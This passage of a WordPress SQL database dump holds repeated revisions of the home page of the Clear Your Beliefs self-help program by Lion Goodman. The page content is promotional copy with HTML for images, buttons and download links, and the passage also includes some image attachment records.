consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 19:58:35', '2014-10-21 00:58:35', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1564, 2, '2014-10-20 20:08:10', '2014-10-21 01:08:10', '', 'head21', '', 'inherit', 'closed', 'open', '', 'head21', '', '', '2014-10-20 20:08:10', '2014-10-21 01:08:10', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/head21.jpg', 0, 'attachment', 'image/jpeg', 0),
(1565, 2, '2014-10-20 20:32:13', '2014-10-21 01:32:13', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/head21.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 20:32:13', '2014-10-21 01:32:13', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1566, 2, '2014-10-20 20:48:49', '2014-10-21 01:48:49', '', 'headb', '', 'inherit', 'closed', 'open', '', 'headb', '', '', '2014-10-20 20:48:49', '2014-10-21 01:48:49', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg', 0, 'attachment', 'image/jpeg', 0),
(1567, 2, '2014-10-20 20:52:36', '2014-10-21 01:52:36', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 20:52:36', '2014-10-21 01:52:36', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1569, 2, '2014-10-20 21:01:27', '2014-10-21 02:01:27', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 21:01:27', '2014-10-21 02:01:27', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1568, 2, '2014-10-20 20:57:21', '2014-10-21 01:57:21', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\n<p><a href="http://vimeo.com/109282066">Lion Goodman ICLEAR IT APP 2.mp4</a> from <a href="http://vimeo.com/user33370576">Lion</a> on <a href="https://vimeo.com">Vimeo</a>.</p>\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 20:57:21', '2014-10-21 01:57:21', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1570, 2, '2014-10-20 21:43:25', '2014-10-21 02:43:25', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /> Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 21:43:25', '2014-10-21 02:43:25', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1571, 2, '2014-10-20 21:50:19', '2014-10-21 02:50:19', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The 